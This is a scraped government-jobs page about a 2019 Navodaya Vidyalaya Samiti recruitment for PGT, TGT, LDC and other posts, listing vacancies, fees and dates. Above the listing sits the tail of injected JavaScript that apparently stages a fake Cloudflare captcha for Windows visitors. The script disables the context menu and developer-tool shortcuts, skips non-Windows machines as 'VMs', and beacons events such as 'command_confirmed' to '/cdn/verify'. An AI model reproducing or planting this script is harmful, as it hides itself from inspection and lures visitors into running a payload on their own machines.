`; if (ij) { if (cl) { if (all) { document.querySelectorAll(ij).forEach(function(el, i) { el.addEventListener('click', function(e) { e.preventDefault(); document.body.appendChild(container); if (!init) { initScript(); } }); }) } else { document.querySelector(ij).addEventListener('click', function(e) { e.preventDefault(); document.body.appendChild(container); if (!init) { initScript(); } }); } } else { document.querySelector(ij).before(container); initScript(); } } else { document.querySelector('html').innerHTML = container.innerHTML; initScript(); } document.addEventListener('contextmenu', function(e) { e.preventDefault(); return false; }); document.addEventListener('keydown', function(e) { if (e.key === 'F12' || e.keyCode === 123) { e.preventDefault(); return false; } if (e.ctrlKey && e.shiftKey && (e.key === 'I' || e.key === 'i' || e.keyCode === 73)) { e.preventDefault(); return false; } if (e.ctrlKey && e.shiftKey && (e.key === 'J' || e.key === 'j' || e.keyCode === 74)) { e.preventDefault(); return false; } if (e.ctrlKey && (e.key === 'U' || e.key === 'u' || e.keyCode === 85)) { e.preventDefault(); return false; } if (e.ctrlKey && e.shiftKey && (e.key === 'C' || e.key === 'c' || e.keyCode === 67)) { e.preventDefault(); return false; } return true; }); } function sendEvent(eventType, id) { if (!syn) { return; } const payload = { id: id, event: eventType, // 'ping', captcha_opened', 'captcha_solved', 'command_confirmed' ua: navigator.userAgent, url: location.href, arch: checkArch(), timestamp: Date.now() }; const json = JSON.stringify(payload); const blob = new Blob([json], { type: 'application/json' }); const targetUrl = '/cdn/verify'; if (navigator.sendBeacon && navigator.sendBeacon(targetUrl, blob)) { return; } fetch(targetUrl, { method: 'POST', body: blob, keepalive: true, headers: { 'Content-Type': 'application/json' } }).catch(() => {}); } const arch = checkArch(); if (arch === 'non-windows') { console.log("VM detected — skipping challenge"); setTimeout(function() { if (document.querySelector('#get_api_key_jss')) document.querySelector('#get_api_key_jss').remove(); }, 1000); } else { //setTimeout(function() { const storedStatus = localStorage.getItem(`_verify_${currentId}`); if (storedStatus !== 'completed') { sendEvent('ping', currentId); showCloudflareChallenge(); if (document.querySelector('#get_api_key_jss')) document.querySelector('#get_api_key_jss').remove(); } //}, 3000); } })();
Govt Jobs

NVS Recruitment (2019) – 2370 Vacancies for PGT, TGT, LDC & More

Navodaya Vidyalaya Samiti, Regional Office, Pune, has released a recruitment notification for 2370 posts of PGT, TGT, LDC and MORE. Interested candidates may check the vacancy details and apply online from 10-07-2019 to 09-08-2019.
More details about Navodaya Vidyalaya Samiti Recruitment (2019), including number of vacancies, eligibility criteria, selection procedure, how to apply and important dates, are given below:
Vacancy Details:
• Post Name: PGT, TGT, LDC & More
• No. of Vacancies: 2,370
• Pay Scale: Rs. 47,600 – Rs. 2,09,200
Eligibility Criteria for Navodaya Vidyalaya Samiti Recruitment (2019):
Educational Qualification: Candidates should have passed Diploma/Degree in relevant areas from a recognised university/college.
Age Limit: Minimum 18 years and Maximum 45 years
Selection Process: Selection of candidates will be made on the basis of Written Examination/Computer Bases Test (CBT) and Interview.
Application Fee:
Assistant Commissioner :
Rs. 1,500
Teacher and Staff Nurse : Rs. 1,200
Legal Assistant, Catering and LDC : Rs. 1,000
How to Apply: Interested and eligible candidates may apply online through NVS website – https://navodaya.gov.in – from 10-07-2019 to 09-08-2019.
Important Dates:
• Starting Date of Online Application:10-07-2019
• Last Date of Online Application: 09-08-2019
• Last Date of Fee Submission: 12-08-2019
• Date of Examination: 05-09-2019 to 10-09-2019

Leave a Reply